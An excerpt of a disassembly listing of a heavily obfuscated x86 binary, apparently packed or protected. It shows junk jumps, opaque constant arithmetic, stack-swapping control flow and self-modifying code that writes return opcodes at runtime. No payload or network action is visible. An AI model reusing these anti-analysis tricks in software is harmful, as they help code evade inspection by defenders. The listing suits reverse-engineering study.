; FUNCTION CHUNK AT 00443406 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044A0C8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E292 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00450642 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454B80 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00456C8E SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00456D10 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004573DA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004584C1 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00458605 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004597C7 SIZE 0000000B BYTES

		xchg	esi, [esp-4+arg_0]
		pop	esi
		xchg	edi, [esp-8+arg_4]
		push	edi
		jmp	loc_43D296
sub_44BB73	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44BB80:				; CODE XREF: k2vbe3.d:0044D2ACj
		jnp	loc_442D2A
		add	ecx, edx
		mov	[ebp+0], ebx

loc_44BB8B:				; CODE XREF: k2vbe3.d:00446309j
		xor	ecx, 7FE482B0h
		add	ecx, 3ABDC16Dh
		xchg	ecx, [esp]

loc_44BB9A:				; CODE XREF: k2vbe3.d:0045177Fj
		jmp	sub_444615
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_334. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BDE4

loc_44BBA0:				; CODE XREF: sub_45BDE4+9j
		jmp	loc_4455C0
; END OF FUNCTION CHUNK	FOR sub_45BDE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E542

loc_44BBA5:				; CODE XREF: sub_44E542-4192j
		jmp	nullsub_232
; END OF FUNCTION CHUNK	FOR sub_44E542
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_44BBAA:				; CODE XREF: sub_43F7AC:loc_44B044j
		add	edi, 0B1B2F650h
		and	edi, 56536EEBh
		add	edi, 1558FF1Dh
		rol	edi, 8
		xor	edi, 9A27FD2Bh
		xchg	edi, [esp+0]
		pushf
		jmp	loc_44719B
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------

loc_44BBCE:				; DATA XREF: sub_4461D5:loc_43FFD2o
		push	0A00D1814h
		pop	ebx
		rol	ebx, 1Ah
		add	ebx, 0ADC47B0Bh
		xchg	ebx, [esp]
		jmp	loc_43F279
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4541D3

loc_44BBE5:				; CODE XREF: sub_4541D3:loc_442DC5j
		not	ebp
		xchg	edx, [edi]
		pushf
		or	ebx, 0C36035A0h
		jmp	loc_45C351
; END OF FUNCTION CHUNK	FOR sub_4541D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_44BBF5:				; CODE XREF: sub_456666:loc_459E96j
		push	offset loc_44E85D
		jmp	loc_43DEF7
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E388

loc_44BBFF:				; CODE XREF: sub_44E388:loc_450A59j
		jge	loc_455B76
; END OF FUNCTION CHUNK	FOR sub_44E388
; START	OF FUNCTION CHUNK FOR sub_453FF1

loc_44BC05:				; CODE XREF: sub_453FF1-F510j
		jmp	loc_456185
; END OF FUNCTION CHUNK	FOR sub_453FF1
; ---------------------------------------------------------------------------
		xor	esi, edi
		mov	esi, [ebp+0]
		or	ebx, 0B68030Ch
		jmp	loc_455B74
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4593D6

loc_44BC1A:				; CODE XREF: sub_4593D6:loc_445610j
		sub	ebx, 3FB9042Ch
		add	ebx, 0C432806Ah

loc_44BC26:				; CODE XREF: k2vbe3.d:loc_44A050j
		xchg	ebx, [esp+0]
		jmp	loc_44385B
; END OF FUNCTION CHUNK	FOR sub_4593D6
; ---------------------------------------------------------------------------

loc_44BC2E:				; CODE XREF: k2vbe3.d:loc_440B49j
					; k2vbe3.d:0044C7B6j
		cmp	edi, 689991A6h
		jmp	loc_44F919
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_44BC39:				; CODE XREF: sub_44E0F6:loc_44BF70j
		jns	loc_43E431
		mov	ecx, edx

loc_44BC41:				; CODE XREF: sub_43DFE1:loc_44A0E7j
		jmp	loc_43E41F
; END OF FUNCTION CHUNK	FOR sub_44E0F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D31B

loc_44BC46:				; CODE XREF: sub_43D31B:loc_44500Aj
		jge	loc_4525BD
		xchg	esi, [ebx]
		ror	edi, 1
		sbb	ebp, ecx
		jmp	loc_4525BD
; END OF FUNCTION CHUNK	FOR sub_43D31B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4461D5

loc_44BC57:				; CODE XREF: sub_4461D5+5DCBj
		or	eax, eax
		jnz	loc_456992
		jmp	loc_44C213
; END OF FUNCTION CHUNK	FOR sub_4461D5
; ---------------------------------------------------------------------------
		push	ebx
		jmp	sub_451719
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452D37

loc_44BC6A:				; CODE XREF: sub_452D37:loc_44A009j
					; k2vbe3.d:0044A018j
		or	edx, 821D5BEh
		xor	edx, 0E32F5F48h
		add	edx, ebp
		add	edx, 177F5501h
		mov	[edx], eax
		jmp	loc_43FBBB
; END OF FUNCTION CHUNK	FOR sub_452D37
; ---------------------------------------------------------------------------

loc_44BC85:				; CODE XREF: k2vbe3.d:loc_44311Bj
		jl	loc_4481AA
		and	ebx, eax
		sub	esi, 2457630Ch
		jmp	loc_4481A8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454463

loc_44BC98:				; CODE XREF: sub_454463:loc_45AD2Bj
		pop	edx

loc_44BC99:				; CODE XREF: k2vbe3.d:loc_44737Dj
		pop	eax
		mov	ds:dword_447990, edx

loc_44BCA0:				; CODE XREF: k2vbe3.d:00444E7Aj
					; sub_458A60+6j
		xchg	eax, edx
		jmp	sub_43FE88
; END OF FUNCTION CHUNK	FOR sub_454463
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443C0D

loc_44BCA6:				; CODE XREF: sub_443C0D+11829j
		cmp	dword ptr [eax-0Ch], 4
		jnz	loc_44BCB9
		add	[ebp+var_8], 4
		jmp	loc_44D7CD
; ---------------------------------------------------------------------------

loc_44BCB9:				; CODE XREF: sub_443C0D+809Dj
		add	[ebp+var_8], 2
		jmp	loc_446682
; END OF FUNCTION CHUNK	FOR sub_443C0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44416D

loc_44BCC2:				; CODE XREF: sub_44416D+13F8j
					; sub_44416D+C36Bj
		test	byte ptr [ebp-8], 20h
		jz	loc_43FCE6
		jmp	sub_44D092
; END OF FUNCTION CHUNK	FOR sub_44416D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C15

loc_44BCD1:				; CODE XREF: sub_456C15-186BEj
		push	2F067B9Eh
		pop	ebx
		xor	ebx, 598E18FAh
		test	ebx, 8000h
		jmp	loc_4445CE
; END OF FUNCTION CHUNK	FOR sub_456C15
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_205. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D83F

loc_44BCE9:				; CODE XREF: sub_43D83F+CD59j
		jmp	nullsub_496
; END OF FUNCTION CHUNK	FOR sub_43D83F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C041

loc_44BCEE:				; CODE XREF: sub_45C041-13C02j
		jmp	loc_452104
; END OF FUNCTION CHUNK	FOR sub_45C041
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44BCF3:				; CODE XREF: sub_44C90E-5EA8j
		jmp	loc_44C255
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
dword_44BCF8	dd 0			; DATA XREF: sub_43C04E+6r
					; sub_43F75C:loc_43F765w ...
dword_44BCFC	dd 0D2FEBBF3h		; DATA XREF: k2vbe3.d:0044AFE5r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447664

loc_44BD00:				; CODE XREF: sub_447664-2FAEj
		jmp	loc_458570
; END OF FUNCTION CHUNK	FOR sub_447664
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E204

loc_44BD05:				; CODE XREF: sub_43E204+Ej
		jmp	loc_440D24
; END OF FUNCTION CHUNK	FOR sub_43E204
; ---------------------------------------------------------------------------
		dw 0D8EFh
dword_44BD0C	dd 0			; DATA XREF: k2vbe3.d:0044127Fw
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_44BD10:				; CODE XREF: sub_450F71-412Dj
		jmp	loc_43CDFB
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		dw 0AA38h
dword_44BD18	dd 77D40000h		; DATA XREF: sub_43C68Er
					; sub_44128B+10BEBr ...
dword_44BD1C	dd 3965E6BAh, 8C5C1933h	; DATA XREF: sub_440C94+F32Do
		db 6Ch,	0C6h, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_44BD27:				; CODE XREF: sub_440C94:loc_43C64Aj
					; sub_45C0CD+13j
		jmp	loc_44E6F1
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4575BD

loc_44BD2C:				; CODE XREF: sub_4575BD-B6C0j
		jmp	loc_4441FC
; END OF FUNCTION CHUNK	FOR sub_4575BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44BD31:				; CODE XREF: sub_45A323-19E58j
		jmp	loc_43EB3F
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
		dw 302Eh
dword_44BD38	dd 234h			; DATA XREF: k2vbe3.d:0044C6B0w
					; k2vbe3.d:0044F5A7r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF20

loc_44BD3C:				; CODE XREF: sub_44FF20-C346j
		jmp	loc_4464E2
; END OF FUNCTION CHUNK	FOR sub_44FF20
; ---------------------------------------------------------------------------
		db 9, 12h, 7Ah
dword_44BD44	dd 7C0h			; DATA XREF: k2vbe3.d:0044467Er
; ---------------------------------------------------------------------------

loc_44BD48:				; CODE XREF: k2vbe3.d:00451AE9j
		jmp	loc_455485
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_44BD4D:				; CODE XREF: sub_44B2D7-C81Cj
		jmp	nullsub_150
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------

loc_44BD52:				; CODE XREF: k2vbe3.d:004503E4j
		xor	edi, 61C3DC78h

loc_44BD58:				; CODE XREF: k2vbe3.d:loc_44E899j
		call	sub_442DDF
		retn
; ---------------------------------------------------------------------------

loc_44BD5E:				; CODE XREF: k2vbe3.d:loc_451234j
		push	ecx
		push	0A587FF5Fh
		pop	ecx
		jmp	loc_43E978
; ---------------------------------------------------------------------------

locret_44BD6A:				; CODE XREF: k2vbe3.d:004551EBj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A39

loc_44BD6B:				; CODE XREF: sub_451A39+Ej
		jmp	loc_43DFFC
; END OF FUNCTION CHUNK	FOR sub_451A39
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_44BD70:				; CODE XREF: sub_450F71-5E70j
		jmp	loc_44CE39
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_44BD75:				; CODE XREF: sub_4580DF:loc_44AC04j
		jb	loc_4510BC
		jmp	loc_4431A5
; END OF FUNCTION CHUNK	FOR sub_4580DF
; ---------------------------------------------------------------------------
		mov	esp, ebp
		xchg	eax, [esp]
		mov	ebp, eax
		pop	eax
		jmp	loc_43DFCC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BC98

loc_44BD8D:				; CODE XREF: sub_45BC98-135DFj
		mov	eax, [esp+4+var_4]
		call	sub_453347
		retn
; END OF FUNCTION CHUNK	FOR sub_45BC98
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4478AB

loc_44BD96:				; CODE XREF: sub_4478AB+F3A4j
		jmp	nullsub_22
; END OF FUNCTION CHUNK	FOR sub_4478AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE0A

loc_44BD9B:				; CODE XREF: sub_43FE0A+12C62j
		jmp	loc_452324
; END OF FUNCTION CHUNK	FOR sub_43FE0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F655

loc_44BDA0:				; CODE XREF: sub_44F655-BC6Fj
		jmp	loc_446CBF
; END OF FUNCTION CHUNK	FOR sub_44F655
; ---------------------------------------------------------------------------
		db 46h,	23h, 0E8h
dword_44BDA8	dd 0			; DATA XREF: sub_4432B0+DE2Bw
					; sub_45512F+4r ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442CA7

loc_44BDAC:				; CODE XREF: sub_442CA7+13397j
		jmp	loc_450690
; END OF FUNCTION CHUNK	FOR sub_442CA7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444EFA

loc_44BDB1:				; CODE XREF: sub_444EFA+6382j
		jmp	loc_44982A
; END OF FUNCTION CHUNK	FOR sub_444EFA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44BDB6:				; CODE XREF: sub_45A323-1987Aj
		jmp	loc_44A281
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_44BDBB	proc near		; CODE XREF: sub_414954+142p
					; sub_417B4D+31p
					; DATA XREF: ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043CEF9 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0043DE23 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0043F4B9 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004414F4 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00441A47 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044351D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004443FC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044797D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E660 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EC19 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F304 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004505A5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004518F1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452BEF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004541FD SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00454A7D SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004578A1 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00457C9F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457ED7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458D5F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458F65 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004595D2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045BDC2 SIZE 00000017 BYTES

		jz	loc_4578A1
		mov	eax, ds:dword_447684
		or	eax, eax
		jnz	loc_441A47
		jmp	loc_452BEF
sub_44BDBB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44BDD4:				; CODE XREF: k2vbe3.d:00450F42j
		xor	eax, ecx
		xchg	esi, [ebx]
		mov	esi, [edi]

loc_44BDDA:				; CODE XREF: k2vbe3.d:loc_450F34j
		add	edi, 60143319h
		call	sub_459810
; START	OF FUNCTION CHUNK FOR sub_44A0D7

loc_44BDE5:				; CODE XREF: sub_44A0D7-9F9Bj
		jmp	nullsub_453
; END OF FUNCTION CHUNK	FOR sub_44A0D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447594

loc_44BDEA:				; CODE XREF: sub_447594+7980j
		push	4318BECDh
		pop	esi
		add	esi, 0A543B56h
		xor	esi, 24E2914Dh
		popf
		xor	eax, esi
		jmp	loc_44B3D2
; END OF FUNCTION CHUNK	FOR sub_447594
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D7A9

loc_44BE04:				; CODE XREF: sub_43D7A9+173F7j
		cmp	ecx, 70349ED2h
		jmp	loc_44DB8D
; END OF FUNCTION CHUNK	FOR sub_43D7A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441885

loc_44BE0F:				; CODE XREF: sub_441885:loc_44A34Bj
		jz	loc_43D583
		jmp	loc_45B9AC
; END OF FUNCTION CHUNK	FOR sub_441885
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_44BE1A:				; CODE XREF: sub_43F7AC:loc_45AF4Fj
		jb	loc_442BA5
		and	ebx, 0DB18693Bh
		jmp	loc_43E9C5
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_44BE2B:				; CODE XREF: sub_451DD8+7j
		xor	eax, ebx
		add	ecx, edx
		call	sub_45744C

loc_44BE34:				; CODE XREF: k2vbe3.d:00450178j
		jmp	loc_44A8BB
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D0A9

loc_44BE39:				; CODE XREF: sub_43D0A9+Cj
		jmp	loc_44F5FE
; END OF FUNCTION CHUNK	FOR sub_43D0A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_44BE3E:				; CODE XREF: sub_4553CC-C33Cj
					; sub_4553CC:loc_4513B9j
		lea	eax, [ebp-25Ch]
		cmp	dword ptr [eax], 47424454h
		jnz	loc_445384
		jmp	loc_45BD67
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441A09

loc_44BE55:				; CODE XREF: sub_441A09:loc_43CBD9j
					; k2vbe3.d:loc_458F31j
		push	0D0D4B475h
		xchg	ebx, [esp+14h+var_14]
		mov	ecx, 4F5F5D62h
		jmp	loc_45411A
; END OF FUNCTION CHUNK	FOR sub_441A09
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44498A

loc_44BE67:				; CODE XREF: sub_44498A:loc_457071j
					; sub_44498A+12704j
		rol	edi, 1Bh
		and	edi, 2349A069h
		test	edi, 20000000h
		jmp	loc_44F08B
; END OF FUNCTION CHUNK	FOR sub_44498A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A58

loc_44BE7B:				; CODE XREF: sub_457A58:loc_43EDAEj
		sub	eax, 92937C06h
		xor	eax, 69B25869h
		call	sub_4553CC
		push	offset loc_44B053
		jmp	loc_45B766
; END OF FUNCTION CHUNK	FOR sub_457A58
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FB6

loc_44BE96:				; CODE XREF: sub_442FB6:loc_43CE53j
		mov	[ebx], al
		pop	ebx
; END OF FUNCTION CHUNK	FOR sub_442FB6
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_44BE99:				; CODE XREF: sub_44ED3C:loc_4563EEj
		jb	loc_44AF97
		push	offset sub_450A40
		jmp	loc_442850
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD01

loc_44BEA9:				; CODE XREF: sub_45A323-17D79j
					; sub_43CD01+B7CEj
		sub	ecx, 0FBAF58ADh
		xor	ecx, 7F220869h
		push	offset loc_45BE27
		jmp	loc_458EB2
; END OF FUNCTION CHUNK	FOR sub_43CD01
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447C43

loc_44BEBF:				; CODE XREF: sub_447C43:loc_455819j
		jz	loc_456822
		jmp	loc_44DACD
; END OF FUNCTION CHUNK	FOR sub_447C43

; =============== S U B	R O U T	I N E =======================================



sub_44BECA	proc near		; CODE XREF: sub_44B39A:loc_43C718p
					; k2vbe3.d:0044408Fj

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043FA8A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442AEA SIZE 0000003A BYTES
; FUNCTION CHUNK AT 00447C8A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004509A3 SIZE 00000019 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	esi, [esp-4+arg_0]
		mov	edx, esi
		jmp	loc_4509A3
sub_44BECA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		popf
		jmp	sub_447E07
; ---------------------------------------------------------------------------

loc_44BEDE:				; CODE XREF: k2vbe3.d:00449CD3j
		jno	nullsub_89
		xchg	eax, [ebx]
; START	OF FUNCTION CHUNK FOR sub_4575BD

loc_44BEE6:				; CODE XREF: sub_4575BD-15FC3j
		xor	ebx, 1BA8025Bh
		sub	ebx, 27FFF5CAh
		xor	ebx, 250122FBh
		add	eax, ebx
		pop	ebx
		mov	eax, [eax]
		jmp	loc_44BD2C
; END OF FUNCTION CHUNK	FOR sub_4575BD
; ---------------------------------------------------------------------------
		jle	loc_442566
		ror	eax, 3
		jmp	sub_44B208
; ---------------------------------------------------------------------------

loc_44BF10:				; CODE XREF: k2vbe3.d:0043F167j
		push	edx
		or	ebp, 0FC94001Fh
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_44BF17:				; CODE XREF: sub_444D7B:loc_43D1A2j
		xor	ecx, 1A6BAF68h
		rol	ecx, 3
		jmp	loc_45BA1D
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------

loc_44BF25:				; CODE XREF: k2vbe3.d:0044E23Fj
		jbe	loc_43FDB0

loc_44BF2B:				; CODE XREF: k2vbe3.d:0044D785j
		and	eax, 0D58838B0h
		xor	eax, 3A742851h
		call	sub_4553CC
		mov	ds:dword_41E0A0, eax
		jmp	loc_442AD2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D16B

loc_44BF47:				; CODE XREF: sub_44D16B:loc_449F3Cj
		xor	edi, 105C58CBh
		and	edi, 0D8A44A8h
		sub	edi, 8DAF1103h
		xor	edi, 3ECB7869h
		add	edi, ebp
		add	edi, 0BA6C7488h
		mov	[edi], eax
		pop	edi
		jmp	loc_43F765
; END OF FUNCTION CHUNK	FOR sub_44D16B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_368. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_44BF70:				; CODE XREF: sub_44E0F6-ABDEj
		jmp	loc_44BC39
; END OF FUNCTION CHUNK	FOR sub_44E0F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453AE8

loc_44BF75:				; CODE XREF: sub_453AE8:loc_45700Dj
		jle	loc_454EE7
		test	esi, 0A339062h
		jmp	loc_44E4AC
; END OF FUNCTION CHUNK	FOR sub_453AE8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_49. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44803D

loc_44BF87:				; CODE XREF: sub_44803D+3406j
		jmp	loc_440650
; END OF FUNCTION CHUNK	FOR sub_44803D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_44BF8C:				; CODE XREF: sub_4597AE:loc_44741Ej
		push	esi
		mov	esi, ecx
; END OF FUNCTION CHUNK	FOR sub_4597AE
; START	OF FUNCTION CHUNK FOR sub_4461D5

loc_44BF8F:				; CODE XREF: sub_4461D5+1843j
		xchg	esi, [esp+4+var_4]
		mov	esp, ebp
		xchg	ebx, [esp+4+var_4]
		mov	ebp, ebx
		pop	ebx
		mov	eax, ds:dword_441754
		jmp	loc_44BC57
; END OF FUNCTION CHUNK	FOR sub_4461D5
; ---------------------------------------------------------------------------

loc_44BFA5:				; CODE XREF: k2vbe3.d:loc_448038j
		call	sub_459371
; START	OF FUNCTION CHUNK FOR sub_448A7D

loc_44BFAA:				; CODE XREF: sub_448A7D+10j
		jmp	loc_44FC7F
; END OF FUNCTION CHUNK	FOR sub_448A7D
; ---------------------------------------------------------------------------
		push	ecx
		push	50085BA9h
		pop	ecx
		and	ecx, 0F82C9B7Ch
		jmp	loc_448E3C
; ---------------------------------------------------------------------------

loc_44BFC1:				; DATA XREF: sub_447664:loc_456E5Bo
		add	eax, 9AA784A6h
		call	sub_4553CC
		mov	ds:off_41E09C, eax
		lea	eax, loc_45858F
		mov	byte ptr [eax],	0C3h
		jmp	loc_45858F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447664

loc_44BFE0:				; CODE XREF: sub_447664+10F2Cj
		mov	eax, [esp+8+var_8]
		jmp	loc_446E0B
; END OF FUNCTION CHUNK	FOR sub_447664
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B26

loc_44BFE8:				; CODE XREF: sub_455B26-16176j
		push	eax
		push	0
		push	eax
		push	0FA26257Eh
		jmp	loc_449228
; END OF FUNCTION CHUNK	FOR sub_455B26
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_44BFF6:				; CODE XREF: sub_44B94B-E833j
		add	eax, 5
		cmp	eax, ds:dword_445628
		jz	loc_45686D

loc_44C005:				; CODE XREF: k2vbe3.d:0043D109j
					; sub_44B94B-92EBj
		jz	loc_445167
		mov	eax, [ebp-4]
		call	sub_44746F
		jmp	loc_44D404
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A56B

loc_44C018:				; CODE XREF: sub_44A56B:loc_4414EFj
		rol	eax, 0Eh
		sub	eax, 6EE1E0A5h
		xor	eax, 5FBA6BA4h
		jmp	loc_455321
; END OF FUNCTION CHUNK	FOR sub_44A56B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447692

loc_44C02C:				; CODE XREF: sub_447692j
		mov	eax, ds:dword_44F64C
		or	eax, eax
		jnz	loc_44DAEE
		jmp	loc_444984
; END OF FUNCTION CHUNK	FOR sub_447692

; =============== S U B	R O U T	I N E =======================================



sub_44C03F	proc near		; CODE XREF: k2vbe3.d:00443851p
					; k2vbe3.d:00444162j

; FUNCTION CHUNK AT 00457C9A SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	byte ptr [eax],	0C3h
		jmp	loc_457C9A
sub_44C03F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518A6

loc_44C04B:				; CODE XREF: sub_4518A6:loc_4547F6j
		mov	eax, [esp-4+arg_0]
		push	edx
		push	edx
		push	0D2DC0DFBh
		jmp	loc_44753D
; END OF FUNCTION CHUNK	FOR sub_4518A6
; ---------------------------------------------------------------------------
		push	edi
		push	0D380146Ch
		pop	edi
		or	edi, 9B977EE4h
		and	edi, 0CF76EBCDh
		jmp	loc_4512EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454EDD

loc_44C072:				; CODE XREF: sub_454EDD+B6Dj
		xchg	eax, [ebp+0]
		shl	eax, 16h
		jnb	loc_43FFB2
		jmp	loc_458E5C
; END OF FUNCTION CHUNK	FOR sub_454EDD
; ---------------------------------------------------------------------------
		push	ebx
		call	sub_45C002

loc_44C089:				; CODE XREF: k2vbe3.d:004562E1j
		jmp	loc_4485C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444AB3

loc_44C08E:				; CODE XREF: sub_444AB3+9j
		jmp	nullsub_467
; END OF FUNCTION CHUNK	FOR sub_444AB3
; ---------------------------------------------------------------------------
		jnz	loc_43EEB6
		push	86498AF9h
		pop	edx
		sub	edx, 0D54A44DBh
		or	edx, 0CA582796h
		cmp	edx, 49A01703h
		jmp	loc_44A138
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EB7

loc_44C0B6:				; CODE XREF: sub_451EB7:loc_453E85j
		mov	[ebp-18h], edx
		mov	eax, [ebp-0Ch]
		push	33CB85C0h
		pop	ecx
		sub	ecx, 35E36B49h
		jmp	loc_44A5E1
; END OF FUNCTION CHUNK	FOR sub_451EB7
; ---------------------------------------------------------------------------

loc_44C0CD:				; CODE XREF: k2vbe3.d:0044DD96j
		mov	eax, [esp]
		push	esi
		mov	esi, eax
		xchg	esi, [esp]
		push	edx
		pop	eax
		xchg	eax, [esp]
		jmp	loc_447AFA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_44C0E0:				; CODE XREF: sub_444D7B:loc_45BA1Dj
		call	sub_4580F6

